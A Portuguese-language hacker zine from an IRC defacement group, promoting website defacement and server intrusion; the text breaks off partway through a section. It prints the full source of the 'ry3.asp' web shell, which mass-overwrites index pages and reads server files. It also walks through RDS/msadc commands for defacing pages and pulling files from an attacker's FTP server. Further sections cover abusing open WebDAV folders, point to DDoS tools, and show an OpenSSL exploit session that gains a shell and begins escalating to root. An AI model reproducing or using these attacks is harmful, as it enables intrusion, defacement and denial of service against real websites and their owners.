Acid Zine n°1 - Para melhor visuallização mantenha maximizado - Salvar em seu PC -
No bloco de notas ativar quebra de linha automatica(Editar) - Sou bonito fala ae!!
- - - - - - - - - - - -
_ ____ __ _____ ____ ___ ____ ______
/ \ / __| | | | _ \ / __| / _ \ | _ \ | ____\
| O | | / | | | | \ | | / | / \ | | | \ | | |_
| | | | | | | | | | | | | \_/ | | | || | _|
| | | | \___ | | | |_/ | ________ | \__ | | | |_/ | | |___
/__|__\ \_____| |__| |_____/ |________| \____| \___/ |____/ |_____/ -------------------------------------------------------------------------
Site::----------------WWW.KPcrime.org
Canal::---------------#kpcrime in brasMERDA
eMail::---------------Kernel_panic@hacker.am
Kernel_panic he are : Acid_c0de - Paiste - __k__ - Sc0n - Gary_sagara
"Mouse não encontrado. Bater no gato (S/N)?"
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ INtroDução - (hhmmm....) ]=-
-=[ Eu ]=-
Acho q ninguem sabe quem sou sou, intao vamos falar. Sou um menino de XX anos que frequenta o
irc a 3 meses, sou o fonder do grupo Kernel_panic( #kpcrime,eu jah escrevi lah em cima mais como
tem pessoas que nao leeem o titulo coloco aqui novamente).
tenho amizades e inimizades, mais eu acho q se vc nao gosta de mim deve vir falar em meu pvt,
mais isso nao vem ao caso agora. decidi fazer esta zine por que nao tinha nada para fazer
numa sexta a tarde, intaum reuni algumas coisas q sei e decidi publicar aqui.
Se você tem alguma coisa que queira publicar na proxima zine entre em contato comigo.
PAra enche linguiça vou colocar minha historia
Em meados de 2002 ( junho ou por ai ) começei a fazer meu curso tao desejado de informatica, o basico!!!Nossa.!!!!!!Era um prazewr nao faltava nenhum dia sequer, mais ainda nao ti8nha pc em casa.Chegava no curso mais ou menos uma hora antes para ficar nos bate papos.... afffff....
Em um belo dia um cara me falo que havia um belo site que falava sobre hacking, e me deu o endereço o www.6666.cjb.net. PAssei algum tempo navegando nele e lendo algumas coisas que eu nem entendia o q era, foi um erro, entrei na sessão LAmmer e reparei que os links estavam meios diferentes mais mesmo assim decidi continuar, no primeiro click em "como se tornar um hacker" foi que tudo começou.........
Mais de um milhao de janelas se abriram na minha frente.....putz..minhas pernas adormeceram na hora....me olhos brilharam....porra como ele fez isso????meu prof° faltou ver cristo, ficou loko da vida e me retirou da sala.
Com o passar do tempo começei a frequentar mais sites hackers como o Cemiterio hacker, central do hacker, atividade hacker e talz( esses sites tem todo conteudo puxados do mesmo lugar).
Começei a me enteresar em HTml, fiz a minha primeira page no tripod, mais ainda com o assistente e sem net em ksa, apenas poucos minutos em meu curso.Mais ou menos em setembro ganhei meu PC. Nossa foi o melhor dia da minha vida um dia que ninca vou esquecer, foi um Athlon 1.6, 40GB, 128mb com o windows ME, mais ainda nao tinha telefone e nao acessava a net de casa, fazia tudo emmeu curso.LOgo nos primeiros dias jah domava o HTml e fiz uma pagina com o nome de www.lobopage.cjb.net( elevando que meu apelido é Lobinho....nao vao me caçoar no irc seus merdas!!!!!)Essa foi a minha segunda pagian e primeira em html.
Como o tempo começei a me enteresar em java, pois foi isso que me colocou nesse mundo, fiz entao o www.arp666.cjb.net( pagina que ainda esta no ar)coloquei uns efeitos em java html e talz. Foi em pessquisas que conheci o IRC, logo depois fiz o www.h4k3.kit.net, foi a page mais loka do memento, jah me sentia o super hacker.Quando minha casa foi abençoada com a oitava maravilha do mundo, o telefone tudo se abriu.LOgo no primeiro dia entrei no irc, no #hacker, e conheci o THB_MAtrix, e entrei no clan #THB_Clan, era tudo 7 maravilhas, começei a me enteresar em defaced quando comprei a revista H4CK3R e vi defaceds do grupo Red_eye, hax0rs Lab.Começei a frequentar mais o knal red_eye mais nao aprendia nada, fazia pergutas toscas e sem sentido.
Em um belo dia conheci o Evolui...(beijo morzin...lembrei do c :D )
Um kra que wonava sites e registrava no zone-h( nao era tao burro, jah sabia o que era sites bons de segurança) o kra mne ensinou RDS, , vamos admtir que esse ataque é meio falho, pois nao existem mais sites vullneraveis.
Começei a usar o nick _H4K3_(devido ao site que eu tinha)com o tempo o Evolui me ensinou PDw, nossa ai eu jah me senti o super hacker, wonanva pages( bem soh redeface, mais era soh o começo) montei o 0P3N, atuamos um dia, dai fui instalar o LInux em minha casa, o Mandrake, que soh dava uma unica mensagen de erro "kernel_panic", fiquei loko,tanta raiva que montei o grupo. :D
Com algum tempo o Faisca_Sk8 (dawe cowboy :) ) me aprensentou o Ry3.Asp codado pelo Sujos e me deu uma força pois estava em breve a desistir, foi ai que em um belo dia achei o scan do arplhmd, estava completo agora, fiz muitos mass, conheci muitas pessoas, muitos canais.
Dai decidi mudar de nick depois que wonaram meu site, fiquei brabo mais é a vida, agora sou o Acid_c0de - o gostoso do IRC.
No ultimo dia de meu curso foi publicado um deface meu na H4CK3R, metade de meu sinho jah esta realizado, meu prof° ficou orgulhoso, bem feito hahahahaha
Agora com um pouco mais de 2 meses mexendo com deface, estou aqui sentado em minha cadeira branca escrevendo essa merda que ninguem vai ler e ensinado um pouco d que sei e algumas coisas que achei por ai...
Então vamos ao q interresa.
-=[ Agora sim a introdução ]=-
///////
// X X
// >
/ \__~/
|| /////
(\ \) (~) // o
( \ \ / / // >
( \ \/ /____________/ \__O
( \__/ _____\//
/ | /( / / ______)/
( | // \ \ / / ( )
\ () \ \O/ `
\ | ) )
) ) / /
( |_ / /_
(____> (____>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Indice ]=-
-=[id 1( Usando o PDW )------------------------------------Acid_c0de]=-
-=[id 2( Usando o ry3.asp )--------------------------------Acid_c0de]=-
-=[id 3( ArpLhmd )-----------------------------------------Acid_c0de]=-
-=[id 4( DDos )--------------------------------------------Acid_c0de]=-
-=[id 5( Rds )--------------------------------nem sei quem escreveu]=-
-=[id 5( SSl )-----------------------------------------------ViperX]=-
-=[id 6( CPanel )-----------------------------------------Acid_c0de]=-
-=[id 7( PHPbb 2.0 )--------------------------------------Acid_c0de]=-
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Pdw = Pasta da Web ]=-
Tpw = Vulnerabilidade para explorar e desconfigurar paginas
Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente
Nota = SUX
Bem esta talvez seja umas das tecnicas mais tsc's de invadir um sistema, so de pensar que
ainda existe admin que deixa esta falha assim me da enjoos :(~
Esta é uma falha resultante na mal configuração do servidor, assim deixando vulneravel a
qualquer individuo entrar e vasculhar todo o servidor.
Primeiro vamos encontar um site vulneravel.
Vou lah com o meu scaner codado pelo arplhmd( www.arplhmd.cjb.net ) e coloco em scan a minha
lista feita por outro programa codado pelo arplhmd.
Blz!!!!!!Achei um site!!!!!R0x
Garanto q vc vai dizer isso...........
aqui vai um exemplo q nem sei se quando vc pegar esta zine este site vai estar vull ainda
http://hacker.webhostme.com
Vc vai pensar: Blz achei um site agora vou wonar, mais como????? :/
Assim é facil:
Você vai ate meus locais de rede ( lugar que eu acho que voce nunca abriu neh? Sabia :/ ), clica em adicionar novo local de rede e coloca o endereço la http://hacker.webhostme.com e de OK
Vai demorar um pouco e se der certo vai aparecer uma caixinha pedindo para confirmar ai vc confirma e espera abrir a janela com todo o conteudo do site.
R0x neh?
Nao!!!! Eu acho essa vull vergonhosa, nao q eu nao goste de quem usa ela, se mesmo pq eu usei muito ela, mais com o tempo enjooa sabe.
Depois dela aberta vc podera modificar o q quiser inclusive as index, mais tem muitos sites que vc abre a pasta e nao consegue grava nada nele. POr isso fike esperto.
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Ry3.asp ]=-
Tpw = Exploit para total acesso a maquinas servidoras
Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente
Nota = R0x ( para o xpt por que a vull é tosca)
Aqui veremos o uso do famoso Ry3 codado pelo Sujos do Red Eye.
Ele se trata de um exploit que te da total controle do servidor vullnervel a pdw.
Mais vc deve estar pensando: POxa! deve ser um xpt para rodar no dos e todos aqueles codigos me deixam com dor de cabeça!!!!
Nao!! POde esfriar a cuca pq nao se trata de nada disso.
Vamos ao Uso:
Quando voce descobre um site vullnervel a pdw voce abre a pasta e cola o xpt lah.
Ai você vai em seu navegador preferido, que garanto q é o Internet Explorer, e digita:
www.servidorvullneravel.com/ry3.asp
Pronto a magica esta feita!!!! :D
Agora é so vc fazer o sseguinte, aqui vamos ultilizar um exemplo simples:
Todo servidor IIS ou na maioria das vezes hospeda os sites na pasta c:\wwroot\ ou c:\inetpub , mais isso aparece no xpt em "vc esta em: "
Vamos supor que vc esteja em c:\wwroot. Bem o site que vc colocou o xpt ficara assim c:\wwroot\servidorvulneravel\ry3.asp. O q isso quer dizer?hun.....?nao escutei....?
Dexa pra lah eu falo................
Quer dizer que so sites estao na pasta c:\wwroot.
ò q legal
Mais para que serve isso tudo?
Simples, com isso você podera wonar ( para os mais desinformados wonar significa desconfigurar uma pagina ) mais sites no servidor.
Mais como vou saber a url do site?
Quando vc achar os diretorios vc vai colocar em "caminho" no ry3 assim:
c:\wwroot ( supondo o servidor acima )
Ai vai aparecer os sites que deram OK assim
OK em site 1
OK em site 2
OK em site 3
OK em site 4
OK em site 5
OK em site 6
OK em site 7
OK em site 8
Dai você pega a url do primeiro site e completa com o nome das pastas
EX:www.site1.com, www.site2.com ( suppondo q o server seja www.servidorvullneravel.com )
Você podera pegar o que eu melhorei em http://www.kpcrime.kit.net/ry3.zip
Ai vai o codigo fonte do 1° ry3, mais nao esqueça que ele tem que ser em uma pagina asp hein o burro!!! :/
<%
On Error Resume Next
Set Objeto=Server.CreateObject("Scripting.FileSystemObject")
if request("t5") <> "" then
Set ObjPasta = Objeto.GetFolder(request("t5"))
end if
%>
<%On Error Resume Next
if request("t3") <> "" then
Set ObjPasta2 = Objeto.GetFolder(request("t3"))
set ObjFso=server.CreateObject("Scripting.FileSystemObject")
var_caminho=request("t3")
For Each Pasta in ObjPasta2.Subfolders
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
if err then
response.write "<font color=red><br>Erro em: </font>" & pasta.name
err=0
else
response.write "<br>OK em " & pasta.name
end if
set ObjAbreArq = nothing
next
set ObjFso=nothing
Set ObjPasta2 = nothing
set ObjFso = nothing
end if
%>
<html><head><title>.</title></head>
<body>
<center>Você está em: <%=server.mappath("ry3.asp")%>
<form method=POST action=ry3.asp>
Caminho: <input type="text" name="T3" size="44"><br>
Texto:<input type="text" name="T4" size="73" value="Aqui vai a mensagem para aparecer na page wonada">
<input type="submit" value="Iniciar" name="B1">
</form>
</center>
<form method="POST" action="ry3.asp">
<p align="center">Prompt: <input type="text" name="T5" size="43" value= <%=request("t5")%> ><input type="submit" value="Dir" name="B1"></p>
</form>
<div align="center">
<center>
<table border="1" width="70%" bordercolor="#FF0000" cellspacing="0" cellpadding="0">
<tr>
<td width="50%">
<p align="center">Diretórios Numerados</td>
<td width="50%">
<p align="center">Arquivos</td>
</tr>
<tr>
<td width="50%" valign="top">
<% On Error Resume Next
dim contador
contador=1
For Each Pasta in ObjPasta.Subfolders
Response.Write Contador & "-) "& Pasta.Name & "<br>"
contador=contador+1
next%> </td>
<td width="50%" valign="top">
<%On Error Resume Next
For Each Arquivo in ObjPasta.Files
Response.Write Arquivo.Name & "<br>"
Next%> </td>
</tr>
</table>
</center>
</div>
<form method="POST" action="ry3.asp">
<p align="center">Caminho: <input type="text" name="TT" size="39">
<input type="submit" value="Ver Arquivo" name="B1"></p>
</form>
<%On Error Resume Next
if request("tt") <> "" then
var_caminho=request("tt")
set ObjFso2=server.CreateObject("Scripting.FileSystemObject")
Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False)
Do While Not ObjAbreArq2.AtEndOfStream
Linha = Linha & ObjAbreArq2.Readline & chr(13)
Loop
response.write "<TEXTAREA NAME=sujos ROWS=10 COLS=70>" & Linha & "</TEXTAREA>"
ObjAbreArq2.Close
Set ObjAbreArq2 = Nothing
ObjFso2.close
set ObjFso2 = Nothig
end if%>
</body>
<%set ObjPasta = nothing
set Objeto = nothing%>
</html>
Intaum é isso qualquer duvida me encontre no knal #kpcrime falow!!!
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ ARPLHMD ]=-
Bem esta talvez seja o cara que vai marcar o deface, ele é autor dos mais ultilizados scaners da net, aqui no caso nao vou citar todos, pois sao todos e eu teria que falar muito, e nao estou afim de escrever.
Vou falar do arplhmd netcraft search, que é o programa para fazer lista dos sites a partir do www.netcraft.com, que tem cadastrado mais de 7 milhoes de sites do mundo inteiro.
Voce podera baixar a partir do endereço http://www.arplhmd.cjb.net ( você nao quer que eu dou o endereço certinho neh???)
Aqui vai os mais importantes( ou mais usados)
arplhmd_netcraft_search
Serve para fazer as lista do site, vc coloca uma palavra chave e
aparece sites relacionados a ela
group xploit pdw
o scaner, é soh importar a lista q ele acha sites vull
è muito raro achar site vull, mais por isso nao deista facil
La você podera encontrar ainda varios scaners como o de Pdw, php-nuke entre outras vullnerabilidades.
Vale a pena conferir.
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ DDos ]=-
Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos meses fevereiro/março nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foramatacados. Por exemplo, na madrugada de 19/04 para 20/04 os serviços doUOL, provedor de acesso e notícias on line, ficaram indisponíveis aos seus usuários durante cerca de 6 horas. Adivinhem quem estava por trásdo ataque DDoS... opa! Vamos ao que interessa...
O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada!
É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque:
____________ _____
| Largura | | |
| de | | _ |
|banda alta| | |----|
/|__________| | | |
/ | | |___| |
ALVO / | |
________ / | |
| | / ____________ _____ | ____________ _____
| | <-- / | Largura | | | | | | | |
|Server| ___ /____________| de | | _ | | <-- | VOCÊ | | _ |
| | \ |banda alta| | | --------- | | | |
| | \ |__________| | | | |__________| | |
| | \ | | |___| | | | |___|
|______| \ | |
\ | |
\ ____________ _____ |
\| Largura | | | |
| de | | _ | |
|banda alta| | |----|
|__________| | |
| | |___|
Nota: As máquinas de largura de banda alta são mais eficientes, mas computadores pessoais podem ser usados também.
Você deve ter perguntando antes: mas como fazer grandes números de requisições?? Simples... para isso usamos outros computadores (o que deuma certa forma nos protege, se atacássemos diretamente dos nossos seríamos descobertos rapidamente). Em um ataque DDoS usamos muitos computadores. Sevocê não quiser usar tantos computadores assim, podepraticar o ataque usando computadores de largura de banda alta, geralmente encontrados nas Universidades americanas. Desse modo será preciso poucos computadores, já que eles têm enorme poder de ataque. Nos ataques que pratiquei usei máquinas de Universidades americanas.
Algumas chegavam a ter uma largura de banda de 200 MB... você tem idéiado que significa isso? Bom.. vamos ao que interessa... O ataque funcionadessa forma: você envia um pacote à essas máquinas, elas "entendem" quedevem requisitar intermitentemente o servidor, que será o alvo. Assim,o alvo não suportará as requisições e ficará indisponibilizado.
Está louco para fechar esse arquivo e ir logo praticar um ataque, hein?Mas não é tão simples assim (imaginem se fosse!). As máquinas que você deve usar para suceder o ataque devem estar infectadas com um servidor de serviço. Ou seja, você eve infectá-las, ou conseguir ips de algumas com algum amigo. Eu não estou colocando ips à disposição, pois acho "anti-ético". Os programas mais usados para ataques são: TFN (Tribe Flood Network), TFN2k, trin00, e agora um mais poderoso, que age em conjunto com esses: o mstream.
Você pode encontrar ferramentas para praticar um ataque em:
http://www.ussrback.com/distributed.htm
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Rds ]=-
// Antes de qualquer coisa, vale lembrar que esse texto eh apenas para fins
// educacionais, ou seja, tudo que voce fizer sera responsabilidade sua.
// NAO ESTOU INCENTIVANDO NINGUEM A COMETER CRIMES DIGITAIS.
// Essas falhas e tecnicas ja estao mundialmente conhecidas, mas mesmo assim
// muitos servidores (principalmente do governo brasileiro) ainda estao
// vulneraveis. Espero que apos esse texto os admins REALMENTE percebam os
// enormes riscos deste problema e o elimine.
// Estou levando em conta que voce ira utilizar essas tecnicas apenas
// em suas proprias maquinas ou em maquinas que voce tenha devida autorizacao
// para isso.
Sem apresentacoes, vamos direto ao texto:
Atualmente, podemos perceber uma grande demanda de "raquers" invadindo
paginas do governo e por esse motivo se auto-intitulando "elite".
Entao, mesmo eu nao fazendo parte deste seleto grupo, resolvi mostrar os
grandes segredos de invasao usados por essa "superhypermega elite".
Ate mesmo na pagina do RFP (o que codou o exploit) voce pode ver o texto:
Lammers wanted e um simbolo: RDS. O porque disso tudo? Voce vai entender
ja.
Como identificar uma pagina "raqueada" com MSADC: 99% das vezes essas paginas
estao com fundo branco, apenas com um texto e nenhuma imagem, link, etc
O motivo disso voce ira entender mais abaixo.
MAS ATENCAO! preste muita, mais muita atencao mesmo, porque essa tecnica
e' dificilima, e requer um alto conhecimento tecnico em computacao!
Antes de utiliza-la, recomendo que voce faca como a "elite raquer" e leia
antes os livros: Manual Completo do Raquer (versao 2000!) Panico na
Internerd (1, 2 e 3), e outros textos extremamente tecnicos (huahahahaha)
Obs: Vale lembrar que eu nao estou menosprezando quem usa a tecnica do RDS
(qualquer tecnica que te de acesso a maquina eh valida) e sim esses grupos
que se acham elite por usa-la.
Ok, voce ja leu os livros? Entao VAMOS LA, hora de acao!
Primeiro, voce vai nos sites abaixo ler um pouquinho, pois nao vou ficar aqui
explicando virgula por virgula todos os detalhes do bug. Os textos sao em
ingles, mas tem a traducao de um deles por la. A historia em torno desse bug
eh muito interessante, involvendo umas "alfinetadas" entre o Russ da NTBugtraq
e o RFP.
Mas, se voce prefere fazer como a "elite" e ir direto ao assunto ("Nao preciso
ler essas porcarias"), ok, vai em frente.
http://www.wiretrip.net/rfp/p/doc.asp?id=1
http://www.wiretrip.net/rfp/p/doc.asp?id=3
http://www.wiretrip.net/rfp/p/doc.asp?id=4
http://www.wiretrip.net/rfp/p/doc.asp?id=5
http://www.wiretrip.net/rfp/p/doc.asp?id=29
e dessas hps tem muito mais link p/ vc se virar
Voce vai precisar tambem desse script escrito em perl, mas ATENCAO: nao
divulgue esse script, ou a "elite" vai puxar seu pe a noite.
http://www.wiretrip.net/rfp/bins/scripts/msadc2.pl
Depois voce vai precisar do PERL. Se vc nao tem, www.perl.com e pegue a versao
do seu SO.
Para saber se uma maquina eh vulneravel: vai no browser e digita:
http://www.seuservidor.com/msadc/msadcs.dll
caso o arquivo for encontrado, provavelmente seu servidor eh vulneravel
Encontrou um servudor vulneravel? Ok, entao agora tudo o que voce deve
fazer eh o seguinte: (faca um backup do seu index.htm antes p/ nao perde-lo)
1§ - perl msadc.pl -h www.hostvulneravel.com
ele vai te pedir para digitar um comando. Voce digita:
cmd /c echo Agora tambem sou da elite raquer > caminhoDowwwroot\index.htm
pronto. Parabens, 31337!
"Po, mas como eu consigo o caminhoDowwwroot?"
Vai no seu browser e digita:
www.hostvulneravel.com/qualquermerda.idq
ou
www.hostvulneravel.com/qualquermerda.htx
www.hostvulneravel.com/qualquermerda.idc
existem outros metodos tb (shtml.exe? hum...), isso fica por sua conta
um desses provavelmente ira funcionar, e vc recebera uma pagina com o seguinte
erro:
"path not found c:\inetpub\wwwroot\qualquermerda.idq"
pronto
ou seja, fica
cmd /c echo Agora tambem sou da elite > c:\inetpub\wwwroot\index.htm
Lembrando que outros comandos funcionam perfeitamente. Entao:
cmd /c dir c:\ /s > c:\inetpub\wwwroot\dirc.txt
vai criar uma listagem dos arquivos na unidade c: em
www.hostvulneravel.com/dirc.txt
Parabens, agora voce tambem conhece as tecnicas da "elite".
--[BONUS!]-------------------------------------------------------------------
Como colocar uma html no lugar daquela coisa feia de txt!
(ou qualquer outro arquivo)
Ok, voce viu que seu servidor esta vulneravel, e resolveu colocar uma html la.
Soh que de repente voce percebe que vc nao pode fazer coisas do tipo:
cmd /c echo <HTML> etc,etc,etc </HTML> > c:\inetpub\wwwroot\test.htm
Nao meu amigo, voce tem que usar seu cerebro, e arrumar um outro jeito de
colocar o arquivo que voce quer no servidor, neste exemplo, um HTML.
(Sim, isso mesmo. Por isso que 99% dos defacements com RDS soh possuem um
texto e + nada. Na verdade aquilo nada mais eh que um arquivo texto com
extensao htm).
Existem diversas tecnicas usadas pra isso, algumas envolvendo compartilhamento
de arquivos (usado pelo pessoal do r00tabega em um .pl ai p/ automatizar esse
processo), etc. Porem vou descrever aqui uma outra tecnica que funciona
perfeitamente. Ela consiste em usar o ftp.exe do servidor para fazer os
downloads dos arquivos que nos queremos, e depois usa-los a vontade.
(ultimamente andam saindo uns scripts ai que andam usando essa tecnica,
mas eu vou explicar como fazer na mao mesmo). Vamos la:
Se voce analizar as opcoes do ftp.exe, voce vai ver a seguinte opcao:
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
Isso mesmo, se vc usar ftp -s:comandos.txt ele vai rodar os comandos no
arquivo comandos.txt.
entao, o que vc tem a fazer eh criar um txt no server com os comandos que
voce quer. Voce tem que ter um FTP Server onde voce tenha permissao de escrita
(sim, pode ser o seu mesmo. Levando em consideracao que voce esta usando isso
em maquinas que voce tenha autorizacao, isso nao tem nenhum problema ;)
Ok, digamos que nosso ftp Server eh ftp.meuservidor.com
no diretorio /incoming do ftp.meuservidor.com nos colocamos nosso arquivo
HTML pronto (index.htm)
agora, usamos o script (duh!)
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo open <ip_do_seu_ftp_server> > comandos.txt
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo anonymous >> comandos.txt (algumas vezes vc pode
ter problemas com os 2
primeiros, por isso
os quotes abaixo.)
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo qualquermerda@duh >> comandos.txt
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo quote user anonymous >> comandos.txt
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo quote pass silvio@sol.com.br >> comandos.txt
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo cd /incoming >> comandos.txt (eu gosto de cd antes,
e dai? :P)
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo get index.htm >> comandos.txt
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c echo bye >> comandos.txt
e pra finalizar,
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c ftp -s:comandos.txt
seria melhor ver se tudo ocorreu bem, entao seria melhor usar:
$ perl msadc.pl -h www.hostvulneravel.com
cmd /c ftp -s:comandos.txt > c:\inetpub\wwwroot\ftpresults.txt
e ver no ftpresults.txt se tudo rolou como desejado.
se tudo ocorreu bem, seu html esta la. pronto amigo, agora coloque ele
onde voce quiser :)
(se for passar arquivos binarios, nao esqueca do comando bin antes!)
E dai em diante, voce pode fazer 1000 coisas. Eh soh ter criatividade.
Ok, depois desse texto espero ver algumas htmls legais por ae, e nao aquele
monte de texto feio :P :)
that's all folks
see ya
------------------------------------------------------------------------------
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ SSl ]=-
[*] Ownz Apache SSL server
[*] ViperX The King
[*] No irc BRASnet #AccessDenied ou #ISOTK
[*] ViperX@DaNGeR.OrG
[*] 125588534 Uin
[Indíce]
[1] Introdução
[2] Arquivos nescesários
[3] Invadindo
[4] Adquirindo *root*
[5] Alterando
[6] Finalizando
-----------------------------------
*root* Acesso máximo em um servidor
-----------------------------------
[*] Introdução [*]
Olá, eu sou o ViperX, frequento a brasnet há quase 2 anos, conheço quase todos os grupos
de defacer, carder, sou como todos e estou em busca do mesmo ideal, aprender mais e mais
sobre Hacking, que é uma das áreas da informação mais temida e discutida no dia de hoje.
Nesse simples texto mostrarei para você como se Invadir um sistema rodando Apache SSL
que geralmente é Linux, não é muito complicado, mais toda atenção é poca.
Boa leitura.
[*] Arquivos nescesários [*]
Bom, abaixo irei mostrar alguns arquivos que você irá precisar para ver se o server
está ou não com a falha OpenSSL.
+ Open SSL Scaner
+ Open SSL Exploit
+ Exploit Local
tudo isso citado acima, e um conhecimentozinho sobre sistemas unix.
[*] Invadindo [*]
Após você obter seu exploit na sua shell, você irá rodar assim:
./xploit ip -a target
se o servidor estiver vulnerável, você irá entrar,
: Usando OpenSSL info leak para pegar o endereco
ssl0 : 0x8236f08
ssl1 : 0x8236f08
ssl2 : 0x8236f08
: Mandando BRASA (ou seria shellcode)
ciphers: 0x8236f08 start_addr: 0x8236e48 SHELLCODE_OFS: 208
bash-2.04$
bash-2.04$ uname -a; id; w;
Linux dns.imbp.com.br 2.4.18-2cl #1 Sun Mar 10 23:23:36 BRT 2002 i686 unknown
uid=101(www) gid=102(www) groups=102(www)
4:37am up 4 days, 20:51, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - Mon 8am 14:36m 0.08s 0.08s -bash
bom, podemos ver, que há 2 usuários na máquina, você e o root :)
sim, você deve estar vendo esse uid=101(www) sim, é muito fraco
essa identificação, para alterar dados você precisa ter id=0(root)
... você deve estar se perguntando como pegar root sendo que o root está on,
bagunçou a cabeça aí ?? relacha... root seria como uma autoridade, em tudo na
vida existe mais de uma autoridade certo ? então deu para entender ?
...
[*] Adquirindo root [*]
Bom, como você tá com uma identificação PODRE, você precisará entrar em uma pasta
que você possa executar arquivos, aí que tá .. que pasta hein ? relacha...
digite: cd /tmp
/tmp é uma pasta que todos os usuário contidos no servidor pode executar
qualquer arquivo, bom já deve ter se tocado né ?
Veja se sua máquina possue protocolos tcp/ip de transferências.
digite: wget (Se aparecer é por que possue)
digite: lynx (Se aparecer é por que possue)
